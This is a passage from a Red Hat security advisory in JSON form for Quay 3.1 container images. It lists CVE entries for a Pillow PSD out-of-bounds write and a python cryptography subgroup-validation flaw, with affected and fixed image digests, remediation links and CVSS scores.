"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-25990"
},
{
"category": "external",
"summary": "RHBZ#2439170",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2439170"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-25990",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25990"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-25990",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25990"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/commit/9000313cc5d4a31bdcdd6d7f0781101abab553aa",
"url": "https://github.com/python-pillow/Pillow/commit/9000313cc5d4a31bdcdd6d7f0781101abab553aa"
},
{
"category": "external",
"summary": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-cfh3-3jmp-rvhc",
"url": "https://github.com/python-pillow/Pillow/security/advisories/GHSA-cfh3-3jmp-rvhc"
}
],
"release_date": "2026-02-11T20:53:52.524000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T18:02:58+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5665"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "pillow: Pillow: Out-of-bounds Write via Specially Crafted PSD Image"
},
{
"cve": "CVE-2026-26007",
"cwe": {
"id": "CWE-354",
"name": "Improper Validation of Integrity Check Value"
},
"discovery_date": "2026-02-10T22:01:01.036116+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2438762"
}
],
"notes": [
{
"category": "description",
"text": "A validation flaw has been discovered in the python cryptography package. This missing validation allows an attacker to provide a public key point P from a small-order subgroup. This can lead to security issues in various situations, such as the most commonly used signature verification (ECDSA) and shared key negotiation (ECDH). When the victim computes the shared secret as S = [victim_private_key]P via ECDH, this leaks information about victim_private_key mod (small_subgroup_order). For curves with cofactor \u003e 1, this reveals the least significant bits of the private key. When these weak public keys are used in ECDSA , it\u0027s easy to forge signatures on the small subgroup. Only SECT curves are impacted by this.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "cryptography: cryptography Subgroup Attack Due to Missing Subgroup Validation for SECT Curves",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-26007"
},
{
"category": "external",
"summary": "RHBZ#2438762",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2438762"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-26007",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26007"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-26007",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26007"
},
{
"category": "external",
"summary": "https://github.com/pyca/cryptography/commit/0eebb9dbb6343d9bc1d91e5a2482ed4e054a6d8c",
"url": "https://github.com/pyca/cryptography/commit/0eebb9dbb6343d9bc1d91e5a2482ed4e054a6d8c"
},
{
"category": "external",
"summary": "https://github.com/pyca/cryptography/security/advisories/GHSA-r6ph-v2qm-q3c2",
"url": "https://github.com/pyca/cryptography/security/advisories/GHSA-r6ph-v2qm-q3c2"
}
],
"release_date": "2026-02-10T21:42:56.471000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T18:02:58+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5665"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
